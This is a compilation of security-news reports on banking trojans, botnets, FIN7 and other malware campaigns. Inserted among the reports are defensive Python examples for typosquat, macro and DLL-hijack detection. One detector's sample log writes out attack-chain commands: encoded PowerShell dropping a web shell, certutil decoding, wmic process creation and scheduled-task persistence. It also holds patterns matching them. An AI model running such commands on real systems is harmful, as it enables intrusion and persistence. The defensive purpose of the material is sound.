
Numando: a Banking Trojan Targeting Brazil Abuses YouTube for Spreading

 

ESET researchers have continued their investigation of Latin American banking trojans with Numando, which primarily targets Brazil and, only rarely, Mexico and Spain. Numando is comparable to the other families in its use of phony overlay windows, its backdoor capabilities, and its abuse of public services such as YouTube to host its remote configuration. Unlike several of the Latin American banking trojans, however, Numando shows no signs of continual evolution.

Numando has been operational since 2018, focusing almost entirely on Brazil, though specialists have reported rare attacks on consumers in Mexico and Spain. Written in Delphi, this financial malware displays bogus overlay windows to mislead victims into entering sensitive data, including banking credentials.

It spreads exclusively via spam and phishing campaigns. These efforts are not especially sophisticated, and only a few hundred victims had been found at the time of writing. As a consequence, Numando appears to be "considerably less successful" than other families operating across Latin America, such as Mekotio and Grandoreiro.

The operators' lack of sophistication has probably kept the infection rate low. Recent campaigns distributing Numando consist of spam emails carrying a phishing message and a .ZIP attachment.

“Some Numando variants store these images in an encrypted ZIP archive inside their .rsrc sections, while others utilize a separate Delphi DLL just for this storage. Backdoor capabilities allow Numando to simulate mouse and keyboard actions, restart and shut down the machine, display overlay windows, take screenshots and kill browser processes.” reads the analysis published by ESET. “Unlike other Latin American banking trojans, however, the commands are defined as numbers rather than strings, which inspired our naming of this malware family.” 

A decoy .ZIP file and a genuine .ZIP file are downloaded; the genuine one contains a .CAB archive bundling a legitimate software application, an injector, and the Trojan. The malware itself is hidden within a large .BMP image file. The injector is side-loaded by the legitimate application, and the malware is decrypted using an XOR scheme and a key.

Once on a targeted system, Numando builds counterfeit overlays whenever the victim visits a financial services site. If the user enters credentials, they are captured and forwarded to the malware's C2 server. To manage its remote configuration settings, Numando abuses public services, particularly Pastebin and YouTube. Numando can also simulate mouse clicks and keystrokes, and force the PC to shut down or restart.

Attackers Use Cryptomining Malware to Target Organizations

 

Earlier this year in June, a security researcher from security firm Sonatype uncovered six malicious payloads in the official Python programming language’s PyPI repository that were laced with cryptomining malware. 

The attackers used typosquatted names for the malicious packages, which were downloaded more than 5,000 times. All of them were posted on PyPI by the author "nedog123", some as early as April this year. The typosquats tricked developers into thinking they were installing legitimate packages, hiding the packages' real purpose: hijacking developer systems for cryptomining.

The PyPI incident is notable because it combines three kinds of attack: logic bombs, cryptojacking, and software supply chain attacks. The risk posed by these attacks demands immediate action from organizations that want to protect their data.
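A defender-side check for the typosquatting described above, as an added example that is not code from Sonatype or from the original post: it normalises each requested package name the way PyPI does, measures its edit distance from a curated list of packages the team actually uses, and flags anything that is a keystroke or two away from a real name without being one. The popular package names are real; the lookalike entries in the sample requirements are constructed for illustration and are not the malicious packages the post describes.

```python
"""Pre-install gate for typosquatted PyPI package names.

Added example, not code from Sonatype or from the original post. The popular
package names are real, widely used ones; the lookalike names in the sample
requirements are constructed for illustration and are not the malicious
packages described above.
"""
import re

# Assumption: a curated list of packages the team actually depends on.
POPULAR_PACKAGES = [
    "requests", "numpy", "pandas", "urllib3", "setuptools", "cryptography",
    "matplotlib", "boto3", "django", "flask",
]


def normalize(name):
    """PEP 503 name normalisation: lower-case, runs of '-', '_' and '.' become '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def edit_distance(a, b):
    """Levenshtein distance (insert/delete/substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def typosquat_verdict(name, popular=POPULAR_PACKAGES, max_distance=2):
    """Classify a requested package name.

    Returns ("known", canonical) for an exact allow-list hit,
    ("suspicious", closest) when it is within max_distance edits of a
    popular name without being one, and ("unknown", None) otherwise.
    """
    n = normalize(name)
    canon = [normalize(p) for p in popular]
    if n in canon:
        return ("known", n)
    distance, closest = min((edit_distance(n, c), c) for c in canon)
    if distance <= max_distance:
        return ("suspicious", closest)
    return ("unknown", None)


def scan_requirements(lines):
    """Apply the verdict to every entry of a requirements-style list."""
    findings = []
    for raw in lines:
        entry = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not entry:
            continue
        # Cut the name off at the first version specifier, extra or marker.
        name = re.split(r"[=<>!~\[;\s]", entry, maxsplit=1)[0]
        verdict, closest = typosquat_verdict(name)
        findings.append((name, verdict, closest))
    return findings


# Constructed sample input: two entries are one or two keystrokes from real names.
SAMPLE_REQUIREMENTS = [
    "requests==2.26.0",
    "reqeusts",            # constructed lookalike: transposed letters
    "numpi>=1.0",          # constructed lookalike: one substitution
    "some-internal-tool",  # constructed: not on the list, not close to anything
]

if __name__ == "__main__":
    for name, verdict, closest in scan_requirements(SAMPLE_REQUIREMENTS):
        print(f"{name:22} {verdict:10} {closest or ''}")
```

Run this in CI before `pip install -r requirements.txt`; a "suspicious" verdict should block the build until a human confirms the name is intended. The allow-list is deliberately short and organisation-specific: comparing against all of PyPI would produce near-matches for almost any name.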

Logic Bomb Attacks 

A logic bomb, also known as a 'code bomb', 'cyber bomb', or 'slag code', is a malicious piece of code that executes only when specific conditions are met. One challenge with logic bombs is that they are stealthy by nature and can go undetected for long periods of time.

Logic bombs vary in form and function, which helps malicious actors plant them in ways victims cannot easily detect. They are used for various purposes, such as stealing data, deleting or corrupting data, locking systems, or launching cryptomining processes.

Cryptojacking 

Cryptojacking is the illicit hijacking of computers, smartphones, or even servers to mine cryptocurrency. The attacker consumes the victim's bandwidth, compute capacity, and electricity, and ultimately their money, as the machine works to solve the equations required for mining. In fact, the high resource demand, and therefore the high cost, of cryptomining is exactly why attackers steal it with cryptomining malware. Threat actors also favour crypto-malware because its behavior is hard to predict, and because it can serve as a foot in the door for other payloads and breaches.

Software supply chain attack

In a software supply chain attack, the most common way to target organizations, malicious code is added to third-party software with the aim of compromising the applications that use it. According to the State of the Software Supply Chain report, supply chain attacks increased by a staggering 650% year-on-year, against 430% the previous year.

“Next-generation software supply chain attacks are far more sinister, because bad actors are no longer waiting for public vulnerability disclosures to pursue an exploit. Instead, they are taking the initiative and injecting new vulnerabilities into open source projects that feed the global supply chain, and then exploiting those vulnerabilities before they are discovered,” the report noted. 

How to mitigate the risks 

Organizations are advised to follow the steps mentioned below to protect their database: 

• Use trusted antivirus software 
• Perform regular OS updates 
• Avoid downloading apps from untrusted sources 
• Use red team tests to learn how supply chain attacks could play out within your organization and figure out how to best respond 
• Blacklist mining sites, pirate software sites, and other sites that are likely to lead to shady downloads 
• Disable JavaScript, if feasible 
• Train employees on basic digital safety awareness and practices.

New Android Banking Malware Targeting Mexican Users to Steal Financial Credentials

 

The McAfee Mobile Malware Research Team has discovered an Android banking malware targeting Mexican users by posing either as a banking security tool or as a banking app for reporting an out-of-service ATM.

In both scenarios, the malware relies on a sense of urgency to tempt targets into using the malicious app. If the target falls for the trap, the malware steals the authentication factors needed to access accounts at the targeted financial institutions in Mexico.

How does this malware spread?

Scammers use a malicious phishing page that presents real banking security tips (copied from the bank's genuine site) to lure potential victims into downloading the malicious app, either as a security tool or as an app for reporting an out-of-service ATM.

Researchers believe the scammers reach Android users through scam phone calls, a common approach in Latin America. Fortunately, the malicious app has not yet been found on Google Play; it can only be downloaded from a third-party website.

Here’s how to protect yourself 

During the Covid-19 pandemic, financial institutions adopted various new ways to engage the clients. These rapid changes meant customers were more willing to accept new procedures and to install new apps as part of the ‘new normal’ to interact remotely. Seeing this, cyber-criminals introduced new scams and phishing attacks that looked more credible than those in the past. 

Android banking users in Mexico are advised to be cautious when opening emails and attachments, and to avoid downloading apps from untrusted websites. Organizations and individuals should keep their operating systems and applications updated with the latest security patches, and should enable multi-factor authentication on their accounts wherever possible, the McAfee Mobile Malware Research Team advised.

Last month, researchers at the security firm ThreatFabric discovered a banking malware dubbed "Vultur" in Android apps downloaded from Google Play that attempts to steal banking login information. Vultur recognizes when the victim is using a data entry form, takes a screen grab, and then begins keylogging. All of the captured data is routed to a site specified by its operators.

Sidewalk Backdoor Being Used By China-Linked Grayfly Gang

 

A recent study of a backdoor called Sidewalk has attributed it to Grayfly, the espionage arm of the China-linked APT41 group, which has attacked telecoms in the US, Taiwan, Vietnam, and Mexico. According to Symantec, Grayfly exploits publicly accessible web servers to deploy web shells for initial access before propagating further through the network.

Symantec states that the backdoor is linked to the earlier Crosswalk backdoor; in a report released in August, the security company ESET credited its evolution to a new group it calls SparklingGoblin. Symantec's Threat Hunter Team has now associated the malware with Grayfly (also tracked as GREF and Wicked Panda), a Chinese espionage outfit several of whose members were convicted in the United States last year. Although sometimes referred to as APT41, Symantec regards Grayfly as the espionage offshoot of APT41. According to ESET experts, SparklingGoblin is also connected to the Winnti malware family.

Grayfly has been operational since at least the beginning of 2017. In September 2020, five Chinese nationals were convicted by the U.S. Department of Justice of breaching more than 100 enterprises, government agencies, and other organizations around the world.

"Once a network has been compromised, Grayfly may install its custom backdoors onto additional systems," Symantec says. "These tools allow the attackers to have comprehensive remote access to the network and proxy connections allowing them to access hard-to-reach segments of a target's network." 

Once a target machine was compromised, the intruder loaded a bespoke version of the Mimikatz credential-dumping tool. Grayfly's toolset gives the attackers remote access to the system and proxy connections from outside, providing access to any part of the target's network. Grayfly uses the Sidewalk backdoor alongside a custom Trojan loader.

Symantec researchers investigated one such attack and found that the first indication of compromise was the execution of a Base64-encoded PowerShell command related to Exchange Server. The attacker then used the PowerShell command to run certutil, a built-in Windows tool for managing certification authority data, in order to decode and deploy a web shell. Immediately afterwards, the attacker launched a second Base64-encoded PowerShell command that copied the web shell into the Exchange installation path. A few minutes later, according to the Symantec analysis, a backdoor was executed via installutil.exe. Approximately an hour after that, the attackers issued a WMIC command that ran a Windows batch file and created a scheduled task to run the backdoor, the experts say.

The last phase of this attack was Grayfly running its custom Mimikatz build to dump credentials, the report says.
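Every step of the chain Symantec describes (encoded PowerShell, certutil decoding, installutil.exe, WMIC, a scheduled task) is a process-creation event that endpoint telemetry already records, so the sequence can be caught by correlating those events per host. The following is an added example, not Symantec's tooling or detection logic; it runs over constructed pipe-delimited log lines standing in for Sysmon Event ID 1 or Windows 4688 records, and the hostnames, file names and Exchange path in it are placeholders rather than indicators from the report.

```python
"""Detect the intrusion chain described in the Grayfly write-up in process logs.

Added example; this is not Symantec's tooling or its detection logic. The log
lines are constructed in a simple pipe-delimited format
(timestamp|host|image|command line) standing in for Sysmon Event ID 1 or
Windows 4688 records. Hostnames, file names and the Exchange path are
placeholders, not indicators from the report.
"""
import base64
import re
from datetime import datetime, timedelta


def encode_ps(script):
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_ps(blob):
    """Reverse encode_ps; returns None if the argument is not a valid encoded command."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


# Placeholder encoded payloads so the sample matches what the rule looks for.
_ENC1 = encode_ps("Get-ChildItem 'C:\\PLACEHOLDER\\ExchangeInstallPath'")
_ENC2 = encode_ps("Copy-Item C:\\Windows\\Temp\\x.aspx 'C:\\PLACEHOLDER\\ExchangeInstallPath\\'")

# Constructed sample telemetry approximating the sequence in the post.
SAMPLE_LOG = f"""\
2021-08-01T09:00:01|EXCH01|powershell.exe|powershell.exe -NoP -W Hidden -EncodedCommand {_ENC1}
2021-08-01T09:00:07|EXCH01|certutil.exe|certutil -decode C:\\Windows\\Temp\\x.txt C:\\Windows\\Temp\\x.aspx
2021-08-01T09:00:09|EXCH01|powershell.exe|powershell.exe -enc {_ENC2}
2021-08-01T09:05:30|EXCH01|installutil.exe|InstallUtil.exe /logfile= /LogToConsole=false C:\\Windows\\Temp\\svc.exe
2021-08-01T10:02:11|EXCH01|wmic.exe|wmic process call create "cmd.exe /c C:\\Windows\\Temp\\run.bat"
2021-08-01T10:02:12|EXCH01|schtasks.exe|schtasks /create /tn Updater /tr C:\\Windows\\Temp\\svc.exe /sc minute /mo 30
2021-08-01T11:00:00|WS042|powershell.exe|powershell.exe -File C:\\Scripts\\inventory.ps1
"""

ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
WRITABLE_DIRS = ("\\temp\\", "\\users\\public\\", "\\programdata\\")


def classify(image, cmdline):
    """Map one process-creation event to a stage of the chain, or None."""
    img, cl = image.lower(), cmdline.lower()
    if img == "powershell.exe":
        m = ENCODED_RE.search(cmdline)
        if m and decode_ps(m.group(1)) is not None:
            return "encoded_powershell"
    elif img == "certutil.exe" and ("-decode" in cl or "-urlcache" in cl):
        return "certutil_decode"
    elif img == "installutil.exe" and any(d in cl for d in WRITABLE_DIRS):
        return "installutil_exec"       # .NET installer tool launching from a writable path
    elif img == "wmic.exe" and "process call create" in cl:
        return "wmic_process_create"
    elif img == "schtasks.exe" and "/create" in cl:
        return "scheduled_task"
    return None


def parse_log(text):
    events = []
    for line in text.strip().splitlines():
        ts, host, image, cmdline = line.split("|", 3)
        events.append((datetime.fromisoformat(ts), host, image, cmdline))
    return events


def find_chains(text, min_stages=3, window=timedelta(hours=2)):
    """Return {host: [stages in order]} for hosts showing at least min_stages
    distinct stages within `window` of their first suspicious event."""
    by_host = {}
    for ts, host, image, cmdline in parse_log(text):
        stage = classify(image, cmdline)
        if stage:
            by_host.setdefault(host, []).append((ts, stage))
    alerts = {}
    for host, hits in by_host.items():
        hits.sort()
        start = hits[0][0]
        seen = []
        for ts, stage in hits:
            if ts - start <= window and stage not in seen:
                seen.append(stage)
        if len(seen) >= min_stages:
            alerts[host] = seen
    return alerts


def decoded_powershell(text):
    """Recover the plaintext of every valid -EncodedCommand argument for analyst review."""
    out = []
    for _, host, image, cmdline in parse_log(text):
        m = ENCODED_RE.search(cmdline) if image.lower() == "powershell.exe" else None
        plain = decode_ps(m.group(1)) if m else None
        if plain is not None:
            out.append((host, plain))
    return out


if __name__ == "__main__":
    for host, stages in find_chains(SAMPLE_LOG).items():
        print(host, "->", " > ".join(stages))
    for host, plain in decoded_powershell(SAMPLE_LOG):
        print(host, "decoded:", plain)
```

Any single stage here is noisy on its own (administrators run encoded PowerShell and schtasks too); the value is in requiring several distinct stages on one host inside a short window, and in surfacing the decoded PowerShell so an analyst can see what was actually run rather than a base64 blob.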

Expect more to come, researchers said: “Grayfly is a capable actor, likely to continue to pose a risk to organizations in Asia and Europe across a variety of industries, including telecommunications, finance, and media. It’s likely this group will continue to develop and improve its custom tools to enhance evasion tactics along with using commodity tools such as publicly available exploits and web shells to assist in their attacks.”

43% of all Malware Installations are Concealed in Microsoft Office Documents

 

With the shift from office work to remote work, companies now use hundreds of cloud applications, many of which may be vulnerable to attack or exploitation. This has expanded the attack surface and exposed them to a slew of new threats.

Although infecting office documents with malware is a long-standing technique, it remains very effective at duping people. After embedding a hostile macro in an office document, malicious actors email the infected file to thousands of people and wait for victims to open it. A macro is a collection of commands packaged together to perform a task automatically.

According to recent research by the Atlas VPN team, malicious office documents account for 43 percent of all malware installations. Malicious office files are popular among cybercriminals because they can evade detection by most antivirus programs.

The research is based on the Netskope Threat Lab Cloud and Threat Report: July 2021 Edition, which examined office documents across all platforms, including Microsoft Office 365, Google Docs, PDFs, and others. A year earlier, in the second quarter of 2020, malicious office documents made up only 14 percent of all downloaded malware; in the third quarter of last year the share rose to 38 percent. This growth was driven largely by remote work, as attackers found malware-laden documents to be effective.

The success of EMOTET appears to have spread quickly among cybercriminal gangs, motivating other attackers to adopt a similar approach. Malicious documents also succeed because they can avoid detection by antivirus software and appear to come from a reliable source.

Malicious-document attacks are designed to exploit the user's inability to perceive the danger. Only a blend of cybersecurity knowledge, training, and security software can provide the highest level of protection.

Fraudsters have taken advantage of the popularity of Microsoft Office and Google Docs by introducing malicious code into documents. To protect users from malware attacks, organizations must design and maintain a cybersecurity plan that addresses both the technological and the human components.

Alleged TrickBot Gang Member Arrested While Leaving South Korea




A Russian national, accused of being associated with the TrickBot cybercrime gang, was recently arrested by the authorities at Seoul's international airport while trying to leave South Korea.

Reportedly, the Russian resident, identified by the media as Mr. A, was leaving for his home in Russia after waiting for over a year in South Korea. According to local media reports (Seoul's KBS), he had been prevented from leaving South Korea by COVID-19 travel restrictions: international travel had been canceled by Seoul officials as the global pandemic broke out. Subsequently, Mr. A's passport expired, and he was stranded in South Korea while waiting for it to be renewed.

The Russian man, who allegedly worked as a web browser developer for the malware-spreading TrickBot gang in 2016 while in Russia, denied 'being aware' that he was working for a cybercrime group. "When developing the software, the user manual did not identify malware," he said at the Seoul High Court.

According to a Korean newspaper, an interrogation was held on September 1 at the 20th Criminal Division of the Seoul High Court for the extradition request case against the alleged malware developer. Fighting the US extradition attempt, the accused's lawyer argued that the US would prosecute the man unjustly. "If you send it to the United States, it will be very difficult to exercise your right of defense and there is a good chance that you will be subject to excessive penalties," the attorney claimed.

According to the reports, the suspect maintained that the operation manual for the software he developed did not describe malicious software. He found the work through a job search site and subsequently developed a web browser for the gang, according to The Record. Notably, the recruiters preferred applicants who did not ask a lot of questions.

TrickBot is an advanced banking trojan that targets Windows machines. Initially created to steal the banking information of unsuspecting users, TrickBot has evolved over the last five years to be versatile, widely available, and easy to use. With new variants being increasingly released, TrickBot infections have become more frequent on home office networks; continuous advancement since its inception has cemented TrickBot's reputation as a highly adaptive modular malware.

Pirated Software Used To Distribute Malware

 

Researchers have discovered another persistent operation that employs a network of websites functioning as a "dropper as a service" to distribute a bundle of malware payloads to users looking for "cracked" versions of popular business and consumer programs. The bundle includes click-fraud bots, data stealers, and sometimes even ransomware.

The operation relies on several WordPress-hosted lure pages containing "download" links for software applications; when clicked, these redirect the user to a third-party site that distributes potentially unwanted browser plug-ins and malware, including installers for Raccoon Stealer, Stop ransomware, the Glupteba backdoor, and a wide range of malicious cryptocurrency miners that masquerade as antivirus software.

"Visitors who arrive on these sites are prompted to allow notifications; If they allow this to happen, the websites repeatedly issue false malware alerts," the Sophos researchers said. "If the users click the alerts, they're directed through a series of websites until they arrive at a destination that's determined by the visitor's operating system, browser type, and geographic location." 

The lure pages are pushed to the top of search results through search engine optimization, so that they appear whenever a user searches for illegal copies of a wide range of software. These operations, thought to be the product of an illicit marketplace for paid download services, let entry-level cybercriminals set up and customize campaigns by geographic targeting.

Traffic exchanges, as this distribution infrastructure is also known, generally require a Bitcoin payment before affiliates can create accounts and begin distributing installers. Sites such as InstallBest offer advice on "best practices", for example advising against hosting downloaders on Cloudflare-based servers, on URLs within Discord's CDN, on Bitbucket, or on other cloud platforms.

In addition, the researchers found several operators that, rather than running their own malware delivery networks, act as "go-betweens" to established malvertising networks that pay website owners for traffic.

Earlier, in June, the Crackonosh malware was found abusing the same technique to deploy the XMRig coin miner, silently consuming the affected host's resources to mine Monero. A month later, the criminals behind the MosaicLoader malware were found targeting people looking for pirated software as part of a worldwide effort to install a fully featured backdoor capable of hooking vulnerable Windows systems into a botnet.

Mozi Botnet Creators Arrested by Chinese Law Enforcement Authorities

 

Cybersecurity researchers from the Chinese information security firm Netlab Qihoo 360 reported that at the beginning of this year the authors of the Mozi IoT botnet were detained by Chinese law enforcement authorities, nearly two years after the malware appeared on the threat landscape in late 2019.

“Mozi uses a P2P [peer-to-peer] network structure, and one of the 'advantages' of a P2P network is that it is robust, so even if some of the nodes go down, the whole network will carry on, and the remaining nodes will still infect other vulnerable devices, that is why we can still see Mozi spreading," said Netlab researchers.

The development comes within two weeks of the Microsoft Security Threat Intelligence Center disclosing new capabilities that allow the malware to block web traffic on compromised systems via techniques such as DNS spoofing and HTTP session hijacking, aimed at redirecting users to malicious domains.

At its peak, the malware infected up to 160,000 systems a day and in total managed to compromise more than 1,500,000 different devices, more than half of which (830,000) were located in China, according to a report from Netlab Qihoo 360. 

Mozi, which emerged from the source code of Mirai variants and the Gafgyt malware, has accumulated over 15,800 unique command and control nodes as of April 2020, up from 323 nodes in December 2019, according to a report from Lumen's Black Lotus Labs. By the time the malware was discovered by 360 Netlab researchers, it was actively targeting Netgear, D-Link, and Huawei routers by probing for weak Telnet passwords to compromise them.

The botnet propagates by exploiting weak and default remote-access passwords as well as unpatched vulnerabilities, infecting routers and digital video recorders and co-opting them into an IoT botnet that can be abused for launching distributed denial-of-service (DDoS) attacks, data exfiltration, and payload execution.

According to Netlab, the creators of Mozi also packed in additional upgrades, including a mining trojan that spreads in a worm-like fashion through weak FTP and SSH passwords, and expanded the botnet's features by following a plug-in-like approach in which custom tag commands are defined for different functional nodes. "This convenience is one of the reasons for the rapid expansion of the Mozi botnet," the researchers said.

"The Mozi botnet samples have stopped updating for quite some time, but this does not mean that the threat posed by Mozi has ended. Since the parts of the network that are already spread across the Internet have the ability to continue to be infected, new devices are infected every day,” the researchers warned. 

The malware also uses the DHT protocol to build a peer-to-peer (P2P) network among all compromised devices, allowing bots to send updates and operational instructions to each other directly, so that Mozi continues to function even without a central command-and-control (C&C) server.

FIN7 Hackers Using 'Windows 11 Alpha' Themed Malicious Documents to Drop JavaScript Backdoor



In a recent spear-phishing campaign, the FIN7 cybercrime group used Windows 11 Alpha-themed weaponized Word documents to deliver a JavaScript backdoor.

The initial attack vector is a phishing email campaign posing as 'Windows 11 Alpha'; it carries a malicious Microsoft Word document (.doc). The document displays an image that convinces the user to click 'Enable Editing' and proceed with the installation process. Once the user enables content, the VBA macro contained behind the image executes.

The VBA macro is padded with junk data such as comments, a common strategy criminals use to impede analysis. Once the junk data is stripped out, what remains is the actual VBA macro. Analyzing the JavaScript it delivers, researchers found that it contained obfuscated strings along with a deobfuscation function.
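Both this FIN7 campaign and the Atlas VPN figures in the earlier post on malicious Office documents come down to the same gate: a document carrying a VBA project should never reach a user unexamined. The check below is an added example, not code from Anomali, Atlas VPN or Netskope. Modern Office files (.docx, .docm, .xlsm) are ZIP containers in which the VBA project is stored as a vbaProject.bin part and declared in [Content_Types].xml, so the presence of a macro can be established without executing anything and without trusting the file extension. The sample documents are constructed in memory with placeholder contents so the check runs offline.

```python
"""Check Office Open XML files for embedded VBA projects before they reach users.

Added example; not code from Atlas VPN, Netskope or Anomali. Modern .docx/.docm/
.xlsm files are ZIP containers in which a VBA project is stored as vbaProject.bin
and declared in [Content_Types].xml. The sample documents are constructed in
memory with placeholder contents (the vbaProject.bin body is not real compiled
VBA) so the check can run offline.
"""
import io
import zipfile

VBA_PART_TYPE = "application/vnd.ms-office.vbaproject"   # content type of vbaProject.bin
DOCM_MAIN_TYPE = "application/vnd.ms-word.document.macroenabled.main+xml"
DOCX_MAIN_TYPE = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"


def inspect_office_file(data):
    """Return macro indicators found in an OOXML container.

    The file extension is ignored on purpose: a .docm renamed to .docx still
    carries its macro, and Word will still offer to enable it.
    """
    result = {"is_ooxml": False, "vba_parts": [], "declares_vba": False,
              "macro_enabled_type": False}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return result          # legacy .doc (OLE2) or not an Office file at all
    names = zf.namelist()
    if "[Content_Types].xml" not in names:
        return result
    result["is_ooxml"] = True
    # Indicator 1: a VBA project part exists anywhere in the package.
    result["vba_parts"] = [n for n in names if n.lower().endswith("vbaproject.bin")]
    # Indicators 2 and 3: the content-types manifest declares VBA or a macro-enabled main part.
    types_xml = zf.read("[Content_Types].xml").decode("utf-8", "replace").lower()
    result["declares_vba"] = VBA_PART_TYPE in types_xml
    result["macro_enabled_type"] = "macroenabled" in types_xml
    return result


def has_macros(data):
    """True when any indicator is present; each alone is enough to quarantine."""
    r = inspect_office_file(data)
    return bool(r["vba_parts"]) or r["declares_vba"] or r["macro_enabled_type"]


def build_sample(with_macro):
    """Construct a minimal OOXML-like container (constructed, not real Word output)."""
    main_type = DOCM_MAIN_TYPE if with_macro else DOCX_MAIN_TYPE
    overrides = [f'<Override PartName="/word/document.xml" ContentType="{main_type}"/>']
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        if with_macro:
            overrides.append('<Override PartName="/word/vbaProject.bin" '
                             'ContentType="application/vnd.ms-office.vbaProject"/>')
            zf.writestr("word/vbaProject.bin", b"PLACEHOLDER-NOT-REAL-VBA")
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types>' + "".join(overrides) + "</Types>")
        zf.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()


if __name__ == "__main__":
    for label, sample in (("macro-enabled", build_sample(True)), ("plain", build_sample(False))):
        print(label, inspect_office_file(sample), "-> quarantine" if has_macros(sample) else "-> pass")
```

This handles the OOXML case only; the FIN7 lure is a legacy binary .doc, which is an OLE2 compound file rather than a ZIP and is reported here as "not OOXML". For those, the oletools project's olevba utility extracts the VBA source from OLE2 containers, which also sidesteps the junk-comment padding described above because the analyst sees the actual code rather than the bloated module.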

Researchers found that, upon detecting the languages of certain countries, including Russia, Slovenia, Serbia, Estonia, and Ukraine, the malicious code calls the 'me2XKr' function to delete all the tables and then stops running, in order to prevent execution in those countries.

Primarily targeting the U.S. telecommunications, education, retail, finance, and hospitality sectors with meticulously crafted attacks, FIN7 has managed to stay ahead of law enforcement by employing novel and advanced techniques to evade detection time and again. The threat group, also known as the "Carbanak Group", has increasingly diversified its monetization tactics, which has allowed it to widen the impact of its compromises. As a result, the group has acquired a competitive advantage and has targeted a wide range of industries. Although FIN7 is known for mass payment card data theft, its ambitions are not limited to card data: where end-to-end encryption (E2EE) prevented the attackers from obtaining card data, they turned to attacking the finance departments of the targeted organizations.

In an analysis dated 02 September 2021, Anomali Threat Research said, "The specified targeting of the Clearmind domain fits well with FIN7's preferred modus operandi." "The group's goal appears to have been to deliver a variation of a JavaScript backdoor used by FIN7 since at least 2018."

PRIVATELOG Relies on Common Log File System to Evade Detection

 

Researchers have revealed data about a new malware family that uses the Common Log File System (CLFS) to conceal a second-stage payload in registry transaction files in order to avoid detection. The malware, named PRIVATELOG, and its installer, STASHLOG, were discovered by FireEye's Mandiant Advanced Practices team. Details about the threat actor's identity and motivations are still unknown. 

CLFS (Common Log File System) is a general-purpose logging subsystem for producing high-performance transaction logs that is available to both kernel-mode and user-mode applications. It debuted with Windows Server 2003 R2 and has since been included in subsequent Windows operating systems. CLFS can be used for event logging as well as data logging; TxF and TxR employ it to save transactional state changes before committing a transaction. No built-in Windows utility can examine the binary log files that CLFS creates.

CLFS's goal, like that of any other transactional logging system, is to record a series of steps required for a particular activity so that they can be accurately replayed in the future to commit the transaction to secondary storage or undone if necessary.

Although the malware has yet to be observed in real-world attacks on customer environments or seen launching any second-stage payload, Mandiant believes PRIVATELOG is either still in development, the work of a researcher, or reserved for a highly targeted attack.

“Because the file format is not widely used or documented, there are no available tools that can parse CLFS log files. This provides attackers with an opportunity to hide their data as log records in a convenient way, because these are accessible through API functions. This is similar in nature to malware which may rely, for example, on the Windows Registry or NTFS Extended Attributes to hide their data, which also provide locations to store and retrieve binary data with the Windows API.” explained Mandiant researchers.

PRIVATELOG and STASHLOG have features that allow malicious software to remain undetected on infected machines, such as the use of obfuscated strings and control flow techniques that are specifically designed to make static analysis difficult. 

Mandiant researchers examined a PRIVATELOG sample, an un-obfuscated 64-bit DLL named prntvpt.dll whose exports mimic those of legitimate prntvpt.dll files. PRIVATELOG expects to be loaded from PrintConfig.dll by hijacking the DLL search order. Mandiant has released YARA rules to detect PRIVATELOG and STASHLOG, as well as their variants.
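Beyond the YARA rules, the loading technique itself leaves a telemetry trail: a DLL that normally lives under the Windows system directories being loaded from somewhere else, typically from the same folder as a loader that is also outside those directories. The following is an added example, not Mandiant's rules or tooling, that applies that check to constructed image-load records (Sysmon Event ID 7 would be the real source). The watched names come from the PRIVATELOG description above; the suspicious path is a placeholder.

```python
"""Flag well-known DLL names loaded from unexpected directories (search-order hijack).

Added example; not Mandiant's YARA rules or tooling. The image-load records are
constructed (Sysmon Event ID 7 would be the real source); the suspicious path is
a placeholder, and the watched names come from the PRIVATELOG description above.
"""
import ntpath

# Assumption: these directories (and the side-by-side store) are where Windows
# itself keeps the watched DLLs; anywhere else deserves a look.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")
WATCHED_DLLS = {"prntvpt.dll", "printconfig.dll"}

SAMPLE_IMAGE_LOADS = [
    # (loading process, loaded module) - constructed records
    ("C:\\Windows\\System32\\spoolsv.exe", "C:\\Windows\\System32\\prntvpt.dll"),
    ("C:\\Windows\\System32\\spoolsv.exe",
     "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\PrintConfig.dll"),
    ("C:\\Users\\Public\\Tools\\host.exe", "C:\\Users\\Public\\Tools\\prntvpt.dll"),  # placeholder hijack path
    ("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\WinSxS\\amd64_placeholder\\PrintConfig.dll"),
]


def norm(path):
    """Case-fold and use backslashes so prefix checks are reliable."""
    return path.replace("/", "\\").lower()


def in_trusted_dir(path):
    return any(norm(path).startswith(d) for d in TRUSTED_DIRS)


def assess_load(process, module, watched=WATCHED_DLLS):
    """Return the reasons a module load looks like a hijack (empty list = fine)."""
    reasons = []
    if ntpath.basename(module).lower() not in watched:
        return reasons
    if not in_trusted_dir(module):
        reasons.append("watched DLL outside system directories")
    same_dir = ntpath.dirname(norm(module)) == ntpath.dirname(norm(process))
    if same_dir and not in_trusted_dir(process):
        reasons.append("DLL sits beside a loader that is itself outside system directories")
    return reasons


def suspicious_loads(records, watched=WATCHED_DLLS):
    """Filter image-load records down to those with at least one reason."""
    hits = []
    for process, module in records:
        reasons = assess_load(process, module, watched)
        if reasons:
            hits.append((process, module, reasons))
    return hits


if __name__ == "__main__":
    for process, module, reasons in suspicious_loads(SAMPLE_IMAGE_LOADS):
        print(f"{process} loaded {module}: {'; '.join(reasons)}")
```

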